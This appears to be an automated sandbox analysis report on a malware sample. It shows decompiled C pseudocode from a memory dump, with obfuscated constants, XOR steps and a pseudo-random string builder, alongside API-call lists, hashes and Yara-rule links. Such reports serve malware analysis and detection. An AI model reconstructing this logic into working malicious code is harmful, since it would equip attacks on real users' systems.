                                                                                                            Function 0303520D, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 57%
                                                                                                            			E0303520D(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E0303154A();
				if(_t21 != 0) {
					_t59 =  *0x303d294; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x303d294 = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x303d12c(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E030321DE( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x303d2e0; // 0x22da5a8
					if( *0x303d294 > 5) {
						_t8 = _t26 + 0x303e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x303e9f9; // 0x44283a44
						_t27 = _t7;
					}
					E030311F4(_t27, _t27);
					_t31 = E03033598(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x303d2a8 =  *0x303d2a8 ^ 0x81bbe65d;
						_t32 = E030375F6(0x60);
						 *0x303d364 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x303d364; // 0x53195b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x303d364; // 0x53195b0
							 *_t51 = 0x303e823;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x303d270, 0, 0x43);
							 *0x303d300 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x303d294; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x303d2e0; // 0x22da5a8
								_t13 = _t58 + 0x303e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x303c2a7);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E0303A82B( ~_v8 &  *0x303d2a8, 0x303d00c); // executed
								_t42 = E03034C40(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E030374A5(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E03035461(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E03033FC2(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x303d128();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E03035AB2(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                                                                                                            0x0303520d
                                                                                                            0x03035218
                                                                                                            0x0303521b
                                                                                                            0x0303521e
                                                                                                            0x03035221
                                                                                                            0x03035228
                                                                                                            0x0303522a
                                                                                                            0x03035236
                                                                                                            0x03035238
                                                                                                            0x03035238
                                                                                                            0x03035241
                                                                                                            0x03035247
                                                                                                            0x0303524c
                                                                                                            0x03035266
                                                                                                            0x03035272
                                                                                                            0x03035274
                                                                                                            0x03035279
                                                                                                            0x03035283
                                                                                                            0x03035283
                                                                                                            0x0303527b
                                                                                                            0x0303527b
                                                                                                            0x0303527b
                                                                                                            0x0303527b
                                                                                                            0x0303528a
                                                                                                            0x03035297
                                                                                                            0x0303529e
                                                                                                            0x030352a3
                                                                                                            0x030352a3
                                                                                                            0x030352ab
                                                                                                            0x030352ae
                                                                                                            0x030352d4
                                                                                                            0x030352e0
                                                                                                            0x030352e5
                                                                                                            0x030352ea
                                                                                                            0x030352ec
                                                                                                            0x03035318
                                                                                                            0x0303531a
                                                                                                            0x030352ee
                                                                                                            0x030352f2
                                                                                                            0x030352f7
                                                                                                            0x030352fc
                                                                                                            0x03035303
                                                                                                            0x03035309
                                                                                                            0x0303530e
                                                                                                            0x03035314
                                                                                                            0x0303531b
                                                                                                            0x0303531d
                                                                                                            0x0303531f
                                                                                                            0x0303532e
                                                                                                            0x03035334
                                                                                                            0x03035339
                                                                                                            0x0303533b
                                                                                                            0x0303536b
                                                                                                            0x0303536d
                                                                                                            0x0303533d
                                                                                                            0x0303533d
                                                                                                            0x03035343
                                                                                                            0x03035350
                                                                                                            0x03035356
                                                                                                            0x03035356
                                                                                                            0x0303535e
                                                                                                            0x03035367
                                                                                                            0x0303536e
                                                                                                            0x03035370
                                                                                                            0x03035372
                                                                                                            0x03035379
                                                                                                            0x03035386
                                                                                                            0x0303538b
                                                                                                            0x03035390
                                                                                                            0x03035392
                                                                                                            0x03035394
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03035396
                                                                                                            0x0303539b
                                                                                                            0x0303539d
                                                                                                            0x030353a4
                                                                                                            0x030353a8
                                                                                                            0x030353ab
                                                                                                            0x030353c0
                                                                                                            0x030353c4
                                                                                                            0x030353c9
                                                                                                            0x00000000
                                                                                                            0x030353c9
                                                                                                            0x030353ad
                                                                                                            0x030353af
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x030353ba
                                                                                                            0x030353bc
                                                                                                            0x030353be
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x030353be
                                                                                                            0x030353a1
                                                                                                            0x030353a1
                                                                                                            0x03035372
                                                                                                            0x030352b0
                                                                                                            0x030352b0
                                                                                                            0x030352b5
                                                                                                            0x030353cb
                                                                                                            0x030353cf
                                                                                                            0x030353d7
                                                                                                            0x030353d7
                                                                                                            0x00000000
                                                                                                            0x030353cf
                                                                                                            0x030352bb
                                                                                                            0x030352be
                                                                                                            0x030352c8
                                                                                                            0x030352cf
                                                                                                            0x00000000
                                                                                                            0x030353df
                                                                                                            0x030353df
                                                                                                            0x030353e3
                                                                                                            0x030353e7
                                                                                                            0x030353e7

                                                                                                            APIs
                                                                                                              • Part of subcall function 0303154A: GetModuleHandleA.KERNEL32(4C44544E,00000000,03035226,00000000,00000000), ref: 03031559
                                                                                                            • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 030352A3
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • memset.NTDLL ref: 030352F2
                                                                                                            • RtlInitializeCriticalSection.NTDLL(05319570), ref: 03035303
                                                                                                              • Part of subcall function 03033FC2: memset.NTDLL ref: 03033FD7
                                                                                                              • Part of subcall function 03033FC2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 03034019
                                                                                                              • Part of subcall function 03033FC2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 03034024
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 0303532E
                                                                                                            • wsprintfA.USER32 ref: 0303535E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 4246211962-0
                                                                                                            • Opcode ID: fcd9f34fa1c424d953c120d5eae1ccaa6e1a84691007b211dfc9cb51ae2ccc4d
                                                                                                            • Instruction ID: 5d50e1f08d81bd90278f4dc879eacf9fb60a29418bb887cb99c3c4d201fda1c0
                                                                                                            • Opcode Fuzzy Hash: fcd9f34fa1c424d953c120d5eae1ccaa6e1a84691007b211dfc9cb51ae2ccc4d
                                                                                                            • Instruction Fuzzy Hash: E251F471A47314ABDB50EBB4DC94BAEB3FCAB07700F080865E501EB164E7B4D9448B99
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 030378E6, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 22%
                                                                                                            			E030378E6(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E030375F6(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E03034AAB(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E030375F6((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x303d2b0 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                                                                                            0x030378ed
                                                                                                            0x030378f4
                                                                                                            0x030378f9
                                                                                                            0x030378fc
                                                                                                            0x03037903
                                                                                                            0x03037906
                                                                                                            0x03037909
                                                                                                            0x0303790e
                                                                                                            0x03037913
                                                                                                            0x03037a67
                                                                                                            0x03037a69
                                                                                                            0x03037a6b
                                                                                                            0x03037a70
                                                                                                            0x03037a70
                                                                                                            0x03037919
                                                                                                            0x0303791c
                                                                                                            0x0303791f
                                                                                                            0x03037921
                                                                                                            0x03037921
                                                                                                            0x03037925
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03037929
                                                                                                            0x03037955
                                                                                                            0x0303795a
                                                                                                            0x0303795c
                                                                                                            0x0303795c
                                                                                                            0x0303795f
                                                                                                            0x03037962
                                                                                                            0x03037962
                                                                                                            0x03037964
                                                                                                            0x00000000
                                                                                                            0x0303792f
                                                                                                            0x03037931
                                                                                                            0x03037950
                                                                                                            0x03037950
                                                                                                            0x03037967
                                                                                                            0x03037967
                                                                                                            0x03037968
                                                                                                            0x03037968
                                                                                                            0x0303796b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0303796b
                                                                                                            0x03037935
                                                                                                            0x0303797c
                                                                                                            0x03037980
                                                                                                            0x03037a5a
                                                                                                            0x03037a5c
                                                                                                            0x03037a5c
                                                                                                            0x03037a5d
                                                                                                            0x03037a60
                                                                                                            0x00000000
                                                                                                            0x03037a60
                                                                                                            0x03037989
                                                                                                            0x0303799a
                                                                                                            0x0303799e
                                                                                                            0x03037a56
                                                                                                            0x00000000
                                                                                                            0x03037a56
                                                                                                            0x030379a4
                                                                                                            0x030379a7
                                                                                                            0x030379ab
                                                                                                            0x030379af
                                                                                                            0x030379b4
                                                                                                            0x03037a4c
                                                                                                            0x03037a4c
                                                                                                            0x00000000
                                                                                                            0x03037a52
                                                                                                            0x030379bf
                                                                                                            0x030379c8
                                                                                                            0x030379dc
                                                                                                            0x030379e3
                                                                                                            0x030379f8
                                                                                                            0x030379fe
                                                                                                            0x03037a06
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03037a08
                                                                                                            0x03037a08
                                                                                                            0x03037a08
                                                                                                            0x03037a0f
                                                                                                            0x03037a17
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03037a19
                                                                                                            0x03037a22
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03037a24
                                                                                                            0x03037a26
                                                                                                            0x03037a29
                                                                                                            0x03037a29
                                                                                                            0x03037a2c
                                                                                                            0x03037a30
                                                                                                            0x03037a33
                                                                                                            0x03037a39
                                                                                                            0x03037a3c
                                                                                                            0x03037a43
                                                                                                            0x00000000
                                                                                                            0x030379bf
                                                                                                            0x0303793a
                                                                                                            0x03037942
                                                                                                            0x03037948
                                                                                                            0x0303794a
                                                                                                            0x0303794a
                                                                                                            0x0303794d
                                                                                                            0x0303794f
                                                                                                            0x00000000
                                                                                                            0x0303794f
                                                                                                            0x03037929
                                                                                                            0x0303796f
                                                                                                            0x03037974
                                                                                                            0x03037976
                                                                                                            0x03037976
                                                                                                            0x03037979
                                                                                                            0x03037979
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • lstrcpy.KERNEL32(69B25F45,00000020), ref: 030379E3
                                                                                                            • lstrcat.KERNEL32(69B25F45,00000020), ref: 030379F8
                                                                                                            • lstrcmp.KERNEL32(00000000,69B25F45), ref: 03037A0F
                                                                                                            • lstrlen.KERNEL32(69B25F45), ref: 03037A33
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3214092121-3916222277
                                                                                                            • Opcode ID: cc519957bddcdfd3d8ec3f90d059c404b727c10cc140d9852b305fd0109249e5
                                                                                                            • Instruction ID: 71100dfbbd3aad381261d036787e91a8f52f6bd1d20651b2be0568355f1b98af
                                                                                                            • Opcode Fuzzy Hash: cc519957bddcdfd3d8ec3f90d059c404b727c10cc140d9852b305fd0109249e5
                                                                                                            • Instruction Fuzzy Hash: 5351A0B1A02218EBDF11DF99C5847ADFBFEEF86B14F09815AE855AB201C7719B41CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0303121A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 18%
                                                                                                            			E0303121A(void* __esi) {
				signed int _v8;
				long _v12;
				char _v16;
				long* _v20;
				long _t36;
				long* _t47;
				intOrPtr* _t63;
				intOrPtr* _t64;
				char* _t65;

				_t36 =  *((intOrPtr*)(__esi + 0x28));
				_t63 = __esi + 0x2c;
				_v16 = 0;
				 *_t63 = 0;
				_v12 = _t36;
				if(_t36 != 0) {
					L12:
					return _v12;
				}
				_v8 = 4;
				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
				if(_t36 == 0) {
					L11:
					_v12 = GetLastError();
					goto L12;
				}
				_push( &_v16);
				_push( &_v8);
				_push(_t63);
				_t64 = __imp__; // 0x6ee0fd20
				_push(0);
				_push(0x20000013);
				_push( *((intOrPtr*)(__esi + 0x18)));
				if( *_t64() == 0) {
					goto L11;
				} else {
					_v16 = 0;
					_v8 = 0;
					 *_t64( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
					_t47 = E030375F6(_v8 + 2);
					_v20 = _t47;
					if(_t47 == 0) {
						_v12 = 8;
					} else {
						_push( &_v16);
						_push( &_v8);
						_push(_t47);
						_push(0);
						_push(0x16);
						_push( *((intOrPtr*)(__esi + 0x18)));
						if( *_t64() == 0) {
							_v12 = GetLastError();
						} else {
							_v8 = _v8 >> 1;
							 *((short*)(_v20 + _v8 * 2)) = 0;
							_t65 = E030375F6(_v8 + 1);
							if(_t65 == 0) {
								_v12 = 8;
							} else {
								wcstombs(_t65, _v20, _v8 + 1);
								 *(__esi + 0xc) = _t65;
							}
						}
						E03034AAB(_v20);
					}
					goto L12;
				}
			}












                                                                                                            0x03031220
                                                                                                            0x03031227
                                                                                                            0x0303122a
                                                                                                            0x0303122d
                                                                                                            0x0303122f
                                                                                                            0x03031234
                                                                                                            0x03031317
                                                                                                            0x0303131d
                                                                                                            0x0303131d
                                                                                                            0x0303123e
                                                                                                            0x03031245
                                                                                                            0x0303124d
                                                                                                            0x0303130e
                                                                                                            0x03031314
                                                                                                            0x00000000
                                                                                                            0x03031314
                                                                                                            0x03031256
                                                                                                            0x0303125a
                                                                                                            0x0303125b
                                                                                                            0x0303125c
                                                                                                            0x03031262
                                                                                                            0x03031263
                                                                                                            0x03031268
                                                                                                            0x0303126f
                                                                                                            0x00000000
                                                                                                            0x03031275
                                                                                                            0x03031284
                                                                                                            0x03031287
                                                                                                            0x0303128a
                                                                                                            0x03031293
                                                                                                            0x03031298
                                                                                                            0x0303129d
                                                                                                            0x03031305
                                                                                                            0x0303129f
                                                                                                            0x030312a2
                                                                                                            0x030312a6
                                                                                                            0x030312a7
                                                                                                            0x030312a8
                                                                                                            0x030312a9
                                                                                                            0x030312ab
                                                                                                            0x030312b2
                                                                                                            0x030312f8
                                                                                                            0x030312b4
                                                                                                            0x030312b4
                                                                                                            0x030312bf
                                                                                                            0x030312cd
                                                                                                            0x030312d1
                                                                                                            0x030312e9
                                                                                                            0x030312d3
                                                                                                            0x030312dc
                                                                                                            0x030312e4
                                                                                                            0x030312e4
                                                                                                            0x030312d1
                                                                                                            0x030312fe
                                                                                                            0x030312fe
                                                                                                            0x00000000
                                                                                                            0x0303129d

                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32 ref: 0303130E
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • wcstombs.NTDLL ref: 030312DC
                                                                                                            • GetLastError.KERNEL32 ref: 030312F2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$AllocateHeapwcstombs
                                                                                                            • String ID: @MxtNxt
                                                                                                            • API String ID: 2631933831-1701360479
                                                                                                            • Opcode ID: 84e0de005c89fb0f0dff290d292710fa7ee8224fbd704a9e99a7fd5bcb13939c
                                                                                                            • Instruction ID: eba130b8e38020e78d32e9a38fe9cfb82dfc47eab4b0525136b1f4dac6cfa0d8
                                                                                                            • Opcode Fuzzy Hash: 84e0de005c89fb0f0dff290d292710fa7ee8224fbd704a9e99a7fd5bcb13939c
                                                                                                            • Instruction Fuzzy Hash: D33107B5901208FFDB14EFA5C980AAEB7FCFF49204F144969E542E7250D6309A55DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0303502E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0303502E(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E030337AC(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x303d2e0; // 0x22da5a8
				_t4 = _t24 + 0x303edc8; // 0x5319370
				_t5 = _t24 + 0x303ed70; // 0x4f0053
				_t26 = E03034B28( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x303d2e0; // 0x22da5a8
						_t11 = _t32 + 0x303edbc; // 0x5319364
						_t48 = _t11;
						_t12 = _t32 + 0x303ed70; // 0x4f0053
						_t52 = E0303131E(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x303d2e0; // 0x22da5a8
							_t13 = _t35 + 0x303ee06; // 0x30314549
							if(E0303117A(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x303d294 - 6;
								if( *0x303d294 <= 6) {
									_t42 =  *0x303d2e0; // 0x22da5a8
									_t15 = _t42 + 0x303ec12; // 0x52384549
									E0303117A(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x303d2e0; // 0x22da5a8
							_t17 = _t38 + 0x303ee00; // 0x53193a8
							_t18 = _t38 + 0x303edd8; // 0x680043
							_t40 = E03035DDA(_v8, 0x80000001, _t52, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0x303d270, 0, _t52);
						}
					}
					HeapFree( *0x303d270, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E030351BB(_t54);
				}
				return _t45;
			}



















                                                                                                            0x0303502e
                                                                                                            0x0303503e
                                                                                                            0x03035041
                                                                                                            0x03035048
                                                                                                            0x0303504a
                                                                                                            0x0303504a
                                                                                                            0x0303504d
                                                                                                            0x03035052
                                                                                                            0x03035059
                                                                                                            0x03035066
                                                                                                            0x0303506b
                                                                                                            0x0303506f
                                                                                                            0x0303507d
                                                                                                            0x0303508b
                                                                                                            0x0303508f
                                                                                                            0x03035120
                                                                                                            0x03035120
                                                                                                            0x03035095
                                                                                                            0x03035095
                                                                                                            0x0303509a
                                                                                                            0x0303509a
                                                                                                            0x030350a1
                                                                                                            0x030350ad
                                                                                                            0x030350af
                                                                                                            0x030350b1
                                                                                                            0x030350b3
                                                                                                            0x030350ba
                                                                                                            0x030350cc
                                                                                                            0x030350ce
                                                                                                            0x030350d5
                                                                                                            0x030350d7
                                                                                                            0x030350de
                                                                                                            0x030350e9
                                                                                                            0x030350e9
                                                                                                            0x030350d5
                                                                                                            0x030350ee
                                                                                                            0x030350f3
                                                                                                            0x030350fa
                                                                                                            0x0303510a
                                                                                                            0x03035118
                                                                                                            0x0303511a
                                                                                                            0x0303511a
                                                                                                            0x030350b1
                                                                                                            0x0303512c
                                                                                                            0x0303512c
                                                                                                            0x0303512e
                                                                                                            0x03035133
                                                                                                            0x03035135
                                                                                                            0x03035135
                                                                                                            0x03035140

                                                                                                            APIs
                                                                                                            • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05319370,00000000,?,747DF710,00000000,747DF730), ref: 0303507D
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,053193A8,?,00000000,30314549,00000014,004F0053,05319364), ref: 0303511A
                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,030354EF), ref: 0303512C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 3298025750-1536154274
                                                                                                            • Opcode ID: 6e9066e1579a292086d07011cdee67c8fe749514aaa89ca8135c89f574d1b560
                                                                                                            • Instruction ID: 20fbbd452ac9a918cf6afc23536d17e64604503e4079afcea76af48b06021c9c
                                                                                                            • Opcode Fuzzy Hash: 6e9066e1579a292086d07011cdee67c8fe749514aaa89ca8135c89f574d1b560
                                                                                                            • Instruction Fuzzy Hash: B831B676503108BFDB21EB94DD84FEE7BBCFB5A700F190265E5009B160D7719A15DB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F04C1E0, Relevance: 6.8, APIs: 1, Strings: 2, Instructions: 1543COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,6F0DC338,000008BB), ref: 6F04D345
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName
                                                                                                            • String ID: 1$N
                                                                                                            • API String ID: 514040917-3127171972
                                                                                                            • Opcode ID: 8fd51f56f40f147cd04247e15d4ff0eeeac1c356db84feff344070ed4a42ac0e
                                                                                                            • Instruction ID: 145c3df08cd0ec8d591a1cf2ed114b003f68e25b2a4aeac651a5d9991316f75b
                                                                                                            • Opcode Fuzzy Hash: 8fd51f56f40f147cd04247e15d4ff0eeeac1c356db84feff344070ed4a42ac0e
                                                                                                            • Instruction Fuzzy Hash: C4035E71904952CECB08CF69CE907787FF2FB57325B24816ADD458728BE33955A8EB08
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03033DA0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SysAllocString.OLEAUT32(80000002), ref: 03033DFD
                                                                                                            • SysAllocString.OLEAUT32(030328D9), ref: 03033E41
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 03033E55
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 03033E63
                                                                                                            Memory Dump Source
